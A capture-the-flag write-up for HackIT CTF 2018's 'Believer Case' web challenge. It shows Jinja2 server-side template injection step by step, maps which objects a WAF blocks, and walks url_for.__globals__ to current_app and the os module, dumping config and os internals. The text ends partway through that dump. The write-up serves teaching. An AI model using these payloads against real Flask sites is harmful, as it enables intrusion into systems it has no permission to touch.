CTFtime.org / HackIT CTF 2018 / Believer Case / Writeup

# ▼▼▼Believer Case(Web:447points、39/123=31.7％)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
We managed to hack one of the systems, and its owner contacted us back. He asked us to check his fix. We did not find anything. Can you?

http://185.168.131.123
```

---

```
GET / HTTP/1.1
Host: 185.168.131.123
```

↓

```
Hello! I have been contacted by those who try to save the network. I tried to protect myself. Can you test out if I am secure now? See this
```

---

```
GET /test HTTP/1.1
Host: 185.168.131.123
```

↓

```
test
```

The character input in the URL part is reflected in the response!!

---

## 【Identify the vulnerability】

I thought it was SSTI(Server Side Template Injection) by intuition

↓

```
GET /{{7*7}} HTTP/1.1
Host: 185.168.131.123
```
↓

↓

calculated!! **SSTI by Jinja2!!**

---

※Since it is displayed as Jinja 2 in the error message even below, it is confirmed

```
GET /{{__selt__.__doc__}} HTTP/1.1
Host: 185.168.131.123
```

↓

```
The default undefined type. This undefined type can be printed and
iterated over, but every other access will raise an :exc:`jinja2.exceptions.UndefinedError`:

>>> foo = Undefined(name='foo')
>>> str(foo)
''
>>> not foo
True
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
```

↓

`jinja2`

---

## 【Identify WAF】

Please check my past TWCTF(Web:shrine) writeup for the attribute list under `self`

↓

`https://ctftime.org/writeup/10895`

---

```
GET /{{self}} ⇒500エラー　　　WAF
GET /{{config}} ⇒500エラー　　WAF
GET /{{request}}⇒500エラー　 WAF
GET /{{g}} ⇒<flask.g of 'app'>　Possible use
GET /{{url_for}} ⇒<function url_for at 0x7fde0c3b7a28> Possible use

GET /{{[]}} ⇒500エラー　　 WAF
GET /{{''}} ⇒200OK　　　　　　Possible use
GET /{{()}} ⇒200OK　　　　　 Possible use

```

---

## 【Look for flag via current_app from url_for attribute】

```
GET /{{url_for.__globals__}}
```

↓

```
{'find_package': <function find_package at 0x7fde0c3b7e60>, '_PackageBoundObject': <class 'flask.helpers._PackageBoundObject'>, 'get_load_dotenv': <function get_load_dotenv at 0x7fde0c3b7848>, 'is_ip': <function is_ip at 0x7fde0c3c1578>, 'current_app': <Flask 'app'>, 'PY2': True, 'send_from_directory': <function send_from_directory at 0x7fde0c3b7cf8>, 'session': <NullSession {}>, 'get_flashed_messages': <function get_flashed_messages at 0x7fde0c3b7b90>, 'BadRequest': <class 'werkzeug.exceptions.BadRequest'>, 'posixpath': <module 'posixpath' from '/usr/lib/python2.7/posixpath.pyc'>, 'BuildError': <class 'werkzeug.routing.BuildError'>, 'url_quote': <function url_quote at 0x7fde0cc09410>, 'FileSystemLoader': <class 'jinja2.loaders.FileSystemLoader'>, 'get_root_path': <function get_root_path at 0x7fde0c3b7d70>, '__package__': 'flask', 'locked_cached_property': <class 'flask.helpers.locked_cached_property'>, '_app_ctx_stack': <werkzeug.local.LocalStack object at 0x7fde0c3b0e90>, '_endpoint_from_view_func': <function _endpoint_from_view_func at 0x7fde0c3b78c0>, 'total_seconds': <function total_seconds at 0x7fde0c3b7ed8>, 'get_env': <function get_env at 0x7fde0c3b7578>, '__doc__': '\n flask.helpers\n ~~~~~~~~~~~~~\n\n Implements various helpers.\n\n :copyright: \xc2\xa9 2010 by the Pallets team.\n :license: BSD, see LICENSE for more details.\n', 'flash': <function flash at 0x7fde0c3b7b18>, 'mimetypes': <module 'mimetypes' from '/usr/lib/python2.7/mimetypes.pyc'>, 'adler32': <built-in function adler32>, 'get_template_attribute': <function get_template_attribute at 0x7fde0c3b7aa0>, '_request_ctx_stack': <werkzeug.local.LocalStack object at 0x7fde0c3a49d0>, '__builtins__': {'bytearray': <type 'bytearray'>, 'IndexError': <type 'exceptions.IndexError'>, 'all': <built-in function all>, 'help': Type help() for interactive help, or help(object) for help about object., 'vars': <built-in function vars>, 'SyntaxError': <type 'exceptions.SyntaxError'>, 'unicode': <type 'unicode'>, 'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>, 'memoryview': <type 'memoryview'>, 'isinstance': <built-in function isinstance>, 'copyright': Copyright (c) 2001-2016 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'NameError': <type 'exceptions.NameError'>, 'BytesWarning': <type 'exceptions.BytesWarning'>, 'dict': <type 'dict'>, 'input': <built-in function input>, 'oct': <built-in function oct>, 'bin': <built-in function bin>, 'SystemExit': <type 'exceptions.SystemExit'>, 'StandardError': <type 'exceptions.StandardError'>, 'format': <built-in function format>, 'repr': <built-in function repr>, 'sorted': <built-in function sorted>, 'False': False, 'RuntimeWarning': <type 'exceptions.RuntimeWarning'>, 'list': <type 'list'>, 'iter': <built-in function iter>, 'reload': <built-in function reload>, 'Warning': <type 'exceptions.Warning'>, '__package__': None, 'round': <built-in function round>, 'dir': <built-in function dir>, 'cmp': <built-in function cmp>, 'set': <type 'set'>, 'bytes': <type 'str'>, 'reduce': <built-in function reduce>, 'intern': <built-in function intern>, 'issubclass': <built-in function issubclass>, 'Ellipsis': Ellipsis, 'EOFError': <type 'exceptions.EOFError'>, 'locals': <built-in function locals>, 'BufferError': <type 'exceptions.BufferError'>, 'slice': <type 'slice'>, 'FloatingPointError': <type 'exceptions.FloatingPointError'>, 'sum': <built-in function sum>, 'getattr': <built-in function getattr>, 'abs': <built-in function abs>, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'print': <built-in function print>, 'True': True, 'FutureWarning': <type 'exceptions.FutureWarning'>, 'ImportWarning': <type 'exceptions.ImportWarning'>, 'None': None, 'hash': <built-in function hash>, 'ReferenceError': <type 'exceptions.ReferenceError'>, 'len': <built-in function len>, 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'frozenset': <type 'frozenset'>, '__name__': '__builtin__', 'ord': <built-in function ord>, 'super': <type 'super'>, 'TypeError': <type 'exceptions.TypeError'>, 'license': Type license() to see the full license text, 'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>, 'UserWarning': <type 'exceptions.UserWarning'>, 'filter': <built-in function filter>, 'range': <built-in function range>, 'staticmethod': <type 'staticmethod'>, 'SystemError': <type 'exceptions.SystemError'>, 'BaseException': <type 'exceptions.BaseException'>, 'pow': <built-in function pow>, 'RuntimeError': <type 'exceptions.RuntimeError'>, 'float': <type 'float'>, 'MemoryError': <type 'exceptions.MemoryError'>, 'StopIteration': <type 'exceptions.StopIteration'>, 'globals': <built-in function globals>, 'divmod': <built-in function divmod>, 'enumerate': <type 'enumerate'>, 'apply': <built-in function apply>, 'LookupError': <type 'exceptions.LookupError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'basestring': <type 'basestring'>, 'UnicodeError': <type 'exceptions.UnicodeError'>, 'zip': <built-in function zip>, 'hex': <built-in function hex>, 'long': <type 'long'>, 'next': <built-in function next>, 'ImportError': <type 'exceptions.ImportError'>, 'chr': <built-in function chr>, 'xrange': <type 'xrange'>, 'type': <type 'type'>, '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", 'Exception': <type 'exceptions.Exception'>, 'tuple': <type 'tuple'>, 'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>, 'reversed': <type 'reversed'>, 'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>, 'IOError': <type 'exceptions.IOError'>, 'hasattr': <built-in function hasattr>, 'delattr': <built-in function delattr>, 'setattr': <built-in function setattr>, 'raw_input': <built-in function raw_input>, 'SyntaxWarning': <type 'exceptions.SyntaxWarning'>, 'compile': <built-in function compile>, 'ArithmeticError': <type 'exceptions.ArithmeticError'>, 'str': <type 'str'>, 'property': <type 'property'>, 'GeneratorExit': <type 'exceptions.GeneratorExit'>, 'int': <type 'int'>, '__import__': <built-in function __import__>, 'KeyError': <type 'exceptions.KeyError'>, 'coerce': <built-in function coerce>, 'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>, 'file': <type 'file'>, 'EnvironmentError': <type 'exceptions.EnvironmentError'>, 'unichr': <built-in function unichr>, 'id': <built-in function id>, 'OSError': <type 'exceptions.OSError'>, 'DeprecationWarning': <type 'exceptions.DeprecationWarning'>, 'min': <built-in function min>, 'UnicodeWarning': <type 'exceptions.UnicodeWarning'>, 'execfile': <built-in function execfile>, 'any': <built-in function any>, 'complex': <type 'complex'>, 'bool': <type 'bool'>, 'ValueError': <type 'exceptions.ValueError'>, 'NotImplemented': NotImplemented, 'map': <built-in function map>, 'buffer': <type 'buffer'>, 'max': <built-in function max>, 'object': <type 'object'>, 'TabError': <type 'exceptions.TabError'>, 'callable': <built-in function callable>, 'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>, 'eval': <built-in function eval>, '__debug__': True, 'IndentationError': <type 'exceptions.IndentationError'>, 'AssertionError': <type 'exceptions.AssertionError'>, 'classmethod': <type 'classmethod'>, 'UnboundLocalError': <type 'exceptions.UnboundLocalError'>, 'NotImplementedError': <type 'exceptions.NotImplementedError'>, 'AttributeError': <type 'exceptions.AttributeError'>, 'OverflowError': <type 'exceptions.OverflowError'>}, 'text_type': <type 'unicode'>, '__file__': '/usr/local/lib/python2.7/dist-packages/flask/helpers.pyc', 'get_debug_flag': <function get_debug_flag at 0x7fde0c3b77d0>, 'RLock': <function RLock at 0x7fde0d293398>, 'safe_join': <function safe_join at 0x7fde0c3b7c80>, 'sys': <module 'sys' (built-in)>, 'Headers': <class 'werkzeug.datastructures.Headers'>, 'Range': <class 'werkzeug.datastructures.Range'>, 'stream_with_context': <function stream_with_context at 0x7fde0c3b7938>, '_os_alt_seps': [], '__name__': 'flask.helpers', '_missing': <object object at 0x7fde0fd7b200>, 'pkgutil': <module 'pkgutil' from '/usr/lib/python2.7/pkgutil.pyc'>, 'NotFound': <class 'werkzeug.exceptions.NotFound'>, 'unicodedata': <module 'unicodedata' (built-in)>, 'wrap_file': <function wrap_file at 0x7fde0cc20050>, 'socket': <module 'socket' from '/usr/lib/python2.7/socket.pyc'>, 'update_wrapper': <function update_wrapper at 0x7fde0fd58b90>, 'make_response': <function make_response at 0x7fde0c3b79b0>, 'request': <Request 'http://185.168.131.123/{{url_for.__globals__}}' [GET]>, 'string_types': (<type 'str'>, <type 'unicode'>), 'message_flashed': <flask.signals._FakeSignal object at 0x7fde0c3bf2d0>, 'RequestedRangeNotSatisfiable': <class 'werkzeug.exceptions.RequestedRangeNotSatisfiable'>, 'send_file': <function send_file at 0x7fde0c3b7c08>, 'time': <built-in function time>, 'url_for': <function url_for at 0x7fde0c3b7a28>, '_matching_loader_thinks_module_is_package': <function _matching_loader_thinks_module_is_package at 0x7fde0c3b7de8>, 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>}
```

↓

`current_app` is discovered!!

---

```
GET /{{url_for.__globals__['current_app']}} ⇒500エラー WAF
```

---

```
GET /{{url_for.__globals__.current_app}} ⇒<Flask 'app'>
```

---

```
GET /{{url_for.__globals__.current_app.__dict__}}
```

↓

```
{'subdomain_matching': False, 'error_handler_spec': {None: {}}, '_before_request_lock': <thread.lock object at 0x7fde0c62b730>, 'jinja_env': <flask.templating.Environment object at 0x7fde0c38fe50>, 'before_request_funcs': {}, 'teardown_appcontext_funcs': [], 'shell_context_processors': [], 'after_request_funcs': {}, 'cli': <flask.cli.AppGroup object at 0x7fde0c38f990>, '_blueprint_order': [], 'before_first_request_funcs': [], 'view_functions': {'blacklist_template': <function blacklist_template at 0x7fde0c38bb18>, 'index_template': <function index_template at 0x7fde0c38baa0>, 'static': <bound method Flask.send_static_file of <Flask 'app'>>}, 'instance_path': '/opt/app/instance', 'teardown_request_funcs': {}, 'logger': <logging.Logger object at 0x7fde0c38fb90>, 'url_value_preprocessors': {}, 'config': <Config {'JSON_AS_ASCII': True, 'USE_X_SENDFILE': False, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_DOMAIN': None, 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'SESSION_COOKIE_SAMESITE': None, 'PROPAGATE_EXCEPTIONS': None, 'ENV': 'production', 'DEBUG': False, 'SECRET_KEY': None, 'EXPLAIN_TEMPLATE_LOADING': False, 'MAX_CONTENT_LENGTH': None, 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'JSONIFY_PRETTYPRINT_REGULAR': False, 'TESTING': False, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'TEMPLATES_AUTO_RELOAD': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'JSONIFY_MIMETYPE': 'application/json', 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'TRAP_HTTP_EXCEPTIONS': False}>, '_static_url_path': None, 'jinja_loader': <jinja2.loaders.FileSystemLoader object at 0x7fde0c270f90>, 'template_context_processors': {None: [<function _default_template_ctx_processor at 0x7fde0c374ed8>]}, 'template_folder': 'templates', 'blueprints': {}, 'url_map': Map([<Rule '/' (HEAD, OPTIONS, GET) -> index_template>, <Rule '/static/<filename>' (HEAD, OPTIONS, GET) -> static>, <Rule '/<template>' (HEAD, OPTIONS, GET) -> blacklist_template>]), 'name': 'app', '_got_first_request': True, 'import_name': 'app', 'root_path': '/opt/app', '_static_folder': 'static', 'extensions': {}, 'url_default_functions': {}, 'url_build_error_handlers': []}
```

---

```
GET /{{url_for.__globals__.os.__dict__}}
```

↓

```
{'WTERMSIG': <built-in function WTERMSIG>, 'lseek': <built-in function lseek>, 'EX_IOERR': 74, 'EX_NOHOST': 68, 'seteuid': <built-in function seteuid>, 'pathsep': ':', 'execle': <function execle at 0x7fde0fdf4de8>, 'major': <built-in function major>, '_Environ': <class os._Environ at 0x7fde0fde8ef0>, 'fstatvfs': <built-in function fstatvfs>, 'uname': <built-in function uname>, 'kill': <built-in function kill>, 'urandom': <built-in function urandom>, 'execlp': <function execlp at 0x7fde0fdf4e60>, 'ST_RELATIME': 4096, 'getegid': <built-in function getegid>, 'getresgid': <built-in function getresgid>, 'EX_OSFILE': 72, 'umask': <built-in function umask>, 'linesep': '\n', 'ST_NODIRATIME': 2048, 'fchmod': <built-in function fchmod>, 'lchown': <built-in function lchown>, 'setgid': <built-in function setgid>, 'tmpnam': <built-in function tmpnam>, 'UserDict': <module 'UserDict' from '/usr/lib/python2.7/UserDict.pyc'>, 'devnull': '/dev/null', 'EX_NOINPUT': 66, 'makedev': <built-in function makedev>, 'fstat': <built-in function fstat>, 'getlogin': <built-in function getlogin>, 'EX_TEMPFAIL': 75, 'O_CREAT': 64, 'dup2': <built-in function dup2>, 'read': <built-in function read>, '__file__': '/usr/lib/python2.7/os.pyc', 'getppid': <built-in function getppid>, 'fchown': <built-in function fchown>, 'getloadavg': <built-in function getloadavg>, 'WIFSTOPPED': <built-in function WIFSTOPPED>, 'getpgrp': <built-in function getpgrp>, '_spawnvef': <function _spawnvef at 0x7fde0fdfd2a8>, 'TMP_MAX': 238328, 'utime': <built-in function utime>, 'execl': <function execl at 0x7fde0fdf4d70>, 'ST_SYNCHRONOUS': 16, 'F_OK': 0, '_make_stat_result': <function _make_stat_result at 0x7fde0fdfdd70>, 'ST_WRITE': 128, 'fsync': <built-in function fsync>, 'tcsetpgrp': <built-in function tcsetpgrp>, 'statvfs': <built-in function statvfs>, 'setreuid': <built-in function setreuid>, 'remove': <built-in function remove>, 'setegid': <built-in function setegid>, 'P_NOWAITO': 1, '_copy_reg': <module 'copy_reg' from '/usr/lib/python2.7/copy_reg.pyc'>, 'execv': <built-in function execv>, 'spawnv': <function spawnv at 0x7fde0fdfd320>, 'spawnvpe': <function spawnvpe at 0x7fde0fdfd488>, 'EX_OSERR': 71, 'ttyname': <built-in function ttyname>, 'pardir': '..', 'tempnam': <built-in function tempnam>, 'tmpfile': <built-in function tmpfile>, 'sep': '/', 'mkfifo': <built-in function mkfifo>, 'O_NOFOLLOW': 131072, 'defpath': ':/bin:/usr/bin', 'popen2': <function popen2 at 0x7fde0fdfd6e0>, 'stat': <built-in function stat>, 'O_APPEND': 1024, 'EX_CANTCREAT': 73, 'getresuid': <built-in function getresuid>, 'mknod': <built-in function mknod>, 'O_NOCTTY': 256, 'close': <built-in function close>, 'getgid': <built-in function getgid>, 'ctermid': <built-in function ctermid>, 'WIFSIGNALED': <built-in function WIFSIGNALED>, '_exists': <function _exists at 0x7fde0fdfd230>, 'killpg': <built-in function killpg>, '__all__': ['altsep', 'curdir', 'pardir', 'sep', 'extsep', 'pathsep', 'linesep', 'defpath', 'name', 'path', 'devnull', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END', 'EX_CANTCREAT', 'EX_CONFIG', 'EX_DATAERR', 'EX_IOERR', 'EX_NOHOST', 'EX_NOINPUT', 'EX_NOPERM', 'EX_NOUSER', 'EX_OK', 'EX_OSERR', 'EX_OSFILE', 'EX_PROTOCOL', 'EX_SOFTWARE', 'EX_TEMPFAIL', 'EX_UNAVAILABLE', 'EX_USAGE', 'F_OK', 'NGROUPS_MAX', 'O_APPEND', 'O_ASYNC', 'O_CREAT', 'O_DIRECT', 'O_DIRECTORY', 'O_DSYNC', 'O_EXCL', 'O_LARGEFILE', 'O_NDELAY', 'O_NOATIME', 'O_NOCTTY', 'O_NOFOLLOW', 'O_NONBLOCK', 'O_RDONLY', 'O_RDWR', 'O_RSYNC', 'O_SYNC', 'O_TRUNC', 'O_WRONLY', 'R_OK', 'ST_APPEND', 'ST_MANDLOCK', 'ST_NOATIME', 'ST_NODEV', 'ST_NODIRATIME', 'ST_NOEXEC', 'ST_NOSUID', 'ST_RDONLY', 'ST_RELATIME', 'ST_SYNCHRONOUS', 'ST_WRITE', 'TMP_MAX', 'WCONTINUED', 'WCOREDUMP', 'WEXITSTATUS', 'WIFCONTINUED', 'WIFEXITED', 'WIFSIGNALED', 'WIFSTOPPED', 'WNOHANG', 'WSTOPSIG', 'WTERMSIG', 'WUNTRACED', 'W_OK', 'X_OK', 'abort', 'access', 'chdir', 'chmod', 'chown', 'chroot', 'close', 'closerange', 'confstr', 'confstr_names', 'ctermid', 'dup', 'dup2', 'environ', 'error', 'execv', 'execve', 'fchdir', 'fchmod', 'fchown', 'fdatasync', 'fdopen', 'fork', 'forkpty', 'fpathconf', 'fstat', 'fstatvfs', 'fsync', 'ftruncate', 'getcwd', 'getcwdu', 'getegid', 'geteuid', 'getgid', 'getgroups', 'getloadavg', 'getlogin', 'getpgid', 'getpgrp', 'getpid', 'getppid', 'getresgid', 'getresuid', 'getsid', 'getuid', 'initgroups', 'isatty', 'kill', 'killpg', 'lchown', 'link', 'listdir', 'lseek', 'lstat', 'major', 'makedev', 'minor', 'mkdir', 'mkfifo', 'mknod', 'nice', 'open', 'openpty', 'pathconf', 'pathconf_names', 'pipe', 'popen', 'putenv', 'read', 'readlink', 'remove', 'rename', 'rmdir', 'setegid', 'seteuid', 'setgid', 'setgroups', 'setpgid', 'setpgrp', 'setregid', 'setresgid', 'setresuid', 'setreuid', 'setsid', 'setuid', 'stat', 'stat_float_times', 'stat_result', 'statvfs', 'statvfs_result', 'strerror', 'symlink', 'sysconf', 'sysconf_names', 'system', 'tcgetpgrp', 'tcsetpgrp', 'tempnam', 'times', 'tmpfile', 'tmpnam', 'ttyname', 'umask', 'uname', 'unlink', 'unsetenv', 'urandom', 'utime', 'wait', 'wait3', 'wait4', 'waitpid', 'write', 'makedirs', 'removedirs', 'renames', 'walk', 'execl', 'execle', 'execlp', 'execlpe', 'execvp', 'execvpe', 'getenv', 'spawnv', 'spawnve', 'spawnl', 'spawnle', 'spawnvp', 'spawnvpe', 'spawnlp', 'spawnlpe', 'popen2', 'popen3', 'popen4'], 'ST_APPEND': 256, 'makedirs': <function makedirs at 0x7fde0fdf4b90>, 'setpgid': <built-in function setpgid>, 'getcwdu': <built-in function getcwdu>, 'WNOHANG': 1, 'access': <built-in function access>, 'setsid': <built-in function setsid>, 'NGROUPS_MAX': 65536, 'WIFCONTINUED': <built-in function WIFCONTINUED>, 'O_RDWR': 2, 'P_WAIT': 0, 'stat_result': <type 'posix.stat_result'>, 'walk': <function walk at 0x7fde0fdf4cf8>, 'lstat': <built-in function lstat>, '__builtins__': {'bytearray': <type 'bytearray'>, 'IndexError': <type 'exceptions.IndexError'>, 'all': <built-in function all>, 'help': Type help() for interactive help, or help(object) for help about object., 'vars': <built-in function vars>, 'SyntaxError': <type 'exceptions.SyntaxError'>, 'unicode': <type 'unicode'>, 'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>, 'memoryview': <type 'memoryview'>, 'isinstance': <built-in function isinstance>, 'copyright': Copyright (c) 2001-2016 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'NameError': <type 'exceptions.NameError'>, 'BytesWarning': <type 'exceptions.BytesWarning'>, 'dict': <type 'dict'>, 'input': <built-in function input>, 'oct': <built-in function oct>, 'bin': <built-in function bin>, 'SystemExit': <type 'exceptions.SystemExit'>, 'StandardError': <type 'exceptions.StandardError'>, 'format': <built-in function format>, 'repr': <built-in function repr>, 'sorted': <built-in function sorted>, 'False': False, 'RuntimeWarning': <type 'exceptions.RuntimeWarning'>, 'list': <type 'list'>, 'iter': <built-in function iter>, 'reload': <built-in function reload>, 'Warning': <type 'exceptions.Warning'>, '__package__': None, 'round': <built-in function round>, 'dir': <built-in function dir>, 'cmp': <built-in function cmp>, 'set': <type 'set'>, 'bytes': <type 'str'>, 'reduce': <built-in function reduce>, 'intern': <built-in function intern>, 'issubclass': <built-in function issubclass>, 'Ellipsis': Ellipsis, 'EOFError': <type 'exceptions.EOFError'>, 'locals': <built-in function locals>, 'BufferError': <type 'exceptions.BufferError'>, 'slice': <type 'slice'>, 'FloatingPointError': <type 'exceptions.FloatingPointError'>, 'sum': <built-in function sum>, 'getattr': <built-in function getattr>, 'abs': <built-in function abs>, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'print': <built-in function print>, 'True': True, 'FutureWarning': <type 'exceptions.FutureWarning'>, 'ImportWarning': <type 'exceptions.ImportWarning'>, 'None': None, 'hash': <built-in function hash>, 'ReferenceError': <type 'exceptions.ReferenceError'>, 'len': <built-in function len>, 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'frozenset': <type 'frozenset'>, '__name__': '__builtin__', 'ord': <built-in function ord>, 'super': <type 'super'>, 'TypeError': <type 'exceptions.TypeError'>, 'license': Type license() to see the full license text, 'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>, 'UserWarning': <type 'exceptions.UserWarning'>, 'filter': <built-in function filter>, 'range': <built-in function range>, 'staticmethod': <type 'staticmethod'>, 'SystemError': <type 'exceptions.SystemError'>, 'BaseException': <type 'exceptions.BaseException'>, 'pow': <built-in function pow>, 'RuntimeError': <type 'exceptions.RuntimeError'>, 'float': <type 'float'>, 'MemoryError': <type 'exceptions.MemoryError'>, 'StopIteration': <type 'exceptions.StopIteration'>, 'globals': <built-in function globals>, 'divmod': <built-in function divmod>, 'enumerate': <type 'enumerate'>, 'apply': <built-in function apply>, 'LookupError': <type 'exceptions.LookupError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'basestring': <type 'basestring'>, 'UnicodeError': <type 'exceptions.UnicodeError'>, 'zip': <built-in function zip>, 'hex': <built-in function hex>, 'long': <type 'long'>, 'next': <built-in function next>, 'ImportError': <type 'exceptions.ImportError'>, 'chr': <built-in function chr>, 'xrange': <type 'xrange'>, 'type': <type 'type'>, '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", 'Exception': <type 'exceptions.Exception'>, 'tuple': <type 'tuple'>, 'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>, 'reversed': <type 'reversed'>, 'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>, 'IOError': <type 'exceptions.IOError'>, 'hasattr': <built-in function hasattr>, 'delattr': <built-in function delattr>, 'setattr': <built-in function setattr>, 'raw_input': <built-in function raw_input>, 'SyntaxWarning': <type 'exceptions.SyntaxWarning'>, 'compile': <built-in function compile>, 'ArithmeticError': <type 'exceptions.ArithmeticError'>, 'str': <type 'str'>, 'property': <type 'property'>, 'GeneratorExit': <type 'exceptions.GeneratorExit'>, 'int': <type 'int'>, '__import__': <built-in function __import__>, 'KeyError': <type 'exceptions.KeyError'>, 'coerce': <built-in function coerce>, 'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>, 'file': <type 'file'>, 'EnvironmentError': <type 'exceptions.EnvironmentError'>, 'unichr': <built-in function unichr>, 'id': <built-in function id>, 'OSError': <type 'exceptions.OSError'>, 'DeprecationWarning': <type 'exceptions.DeprecationWarning'>, 'min': <built-in function min>, 'UnicodeWarning': <type 'exceptions.UnicodeWarning'>, 'execfile': <built-in function execfile>, 'any': <built-in function any>, 'complex': <type 'complex'>, 'bool': <type 'bool'>, 'ValueError': <type 'exceptions.ValueError'>, 'NotImplemented': NotImplemented, 'map': <built-in function map>, 'buffer': <type 'buffer'>, 'max': <built-in function max>, 'object': <type 'object'>, 'TabError': <type 'exceptions.TabError'>, 'callable': <built-in function callable>, 'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>, 'eval': <built-in function eval>, '__debug__': True, 'IndentationError': <type 'exceptions.IndentationError'>, 'AssertionError': <type 'exceptions.AssertionError'>, 'classmethod': <type 'classmethod'>, 'UnboundLocalError': <type 'exceptions.UnboundLocalError'>, 'NotImplementedError': <type 'exceptions.NotImplementedError'>, 'AttributeError': <type 'exceptions.AttributeError'>, 'OverflowError': <type 'exceptions.OverflowError'>}, 'getcwd': <built-in function getcwd>, 'setresgid': <built-in function setresgid>, 'O_NOATIME': 262144, 'EX_SOFTWARE': 70, 'symlink': <built-in function symlink>, 'stat_float_times': <built-in function stat_float_times>, 'extsep': '.', '__name__': 'os', 'O_TRUNC': 512, 'getsid': <built-in function getsid>, 'wait': <built-in function wait>, 'O_DIRECTORY': 65536, 'WCONTINUED': 8, 'SEEK_END': 2, 'ST_NOEXEC': 8, 'openpty': <built-in function openpty>, 'initgroups': <built-in function initgroups>, 'popen': <built-in function popen>, 'times': <built-in function times>, 'P_NOWAIT': 1, 'removedirs': <function removedirs at 0x7fde0fdf4c08>, '_pickle_statvfs_result': <function _pickle_statvfs_result at 0x7fde0fdfded8>, 'renames': <function renames at 0x7fde0fdf4c80>, 'readlink': <built-in function readlink>, '_exit': <built-in function _exit>, 'execlpe': <function execlpe at 0x7fde0fdf4ed8>, 'setregid': <built-in function setregid>, 'O_DSYNC': 4096, 'rename': <built-in function rename>, 'O_RSYNC': 1052672, 'fchdir': <built-in function fchdir>, 'mkdir': <built-in function mkdir>, '_get_exports_list': <function _get_exports_list at 0x7fde0fe246e0>, 'ST_NOSUID': 2, 'WCOREDUMP': <built-in function WCOREDUMP>, 'chmod': <built-in function chmod>, 'SEEK_CUR': 1, 'getpgid': <built-in function getpgid>, 'popen4': <function popen4 at 0x7fde0fdfd7d0>, 'O_ASYNC': 8192, '_execvpe': <function _execvpe at 0x7fde0fdf20c8>, 'open': <built-in function open>, 'putenv': <built-in function putenv>, 'fdopen': <built-in function fdopen>, 'errno': <module 'errno' (built-in)>, 'WIFEXITED': <built-in function WIFEXITED>, 'system': <built-in function system>, 'ST_MANDLOCK': 64, 'name': 'posix', 'rmdir': <built-in function rmdir>, 'O_WRONLY': 1, 'dup': <built-in function dup>, 'fdatasync': <built-in function fdatasync>, '__doc__': "OS routines for NT or Posix depending on what system we're on.\n\nThis exports:\n - all functions from posix, nt, os2, or ce, e.g. unlink, stat, etc.\n - os.path is one of the modules posixpath, or ntpath\n - os.name is 'posix', 'nt', 'os2', 'ce' or 'riscos'\n - os.curdir is a string representing the current directory ('.' or ':')\n - os.pardir is a string representing the parent directory ('..' or '::')\n - os.sep is the (or a most common) pathname separator ('/' or ':' or '\\\\')\n - os.extsep is the extension separator ('.' or '/')\n - os.altsep is the alternate pathname separator (None or '/')\n - os.pathsep is the component separator used in $PATH etc\n - os.linesep is the line separator in text files ('\\r' or '\\n' or '\\r\\n')\n - os.defpath is the default search path for executables\n - os.devnull is the file path of the null device ('/dev/null', etc.)\n\nPrograms that import and use 'os' stand a better chance of being\nportable between different platforms. Of course, they must then\nonly use functions that are defined by all platforms (e.g., unlink\nand opendir), and leave all pathname manipulation to os.path\n(e.g., split and join).\n", 'minor': <built-in function minor>, 'getpid': <built-in function getpid>, 'fork': <built-in function fork>, 'isatty': <built-in function isatty>, 'execvpe': <function execvpe at 0x7fde0fdf2050>, 'O_LARGEFILE': 0, 'EX_NOPERM': 77, 'closerange': <built-in function closerange>, 'execvp': <function execvp at 0x7fde0fdf4f50>, 'WSTOPSIG': <built-in function WSTOPSIG>, 'getenv': <function getenv at 0x7fde0fd75b18>, 'sysconf_names': {'SC_REALTIME_SIGNALS': 9, 'SC_PII_OSI_COTS': 63, 'SC_PII_OSI': 57, 'SC_T_IOV_MAX': 66, 'SC_THREADS': 67, 'SC_AIO_MAX': 24, 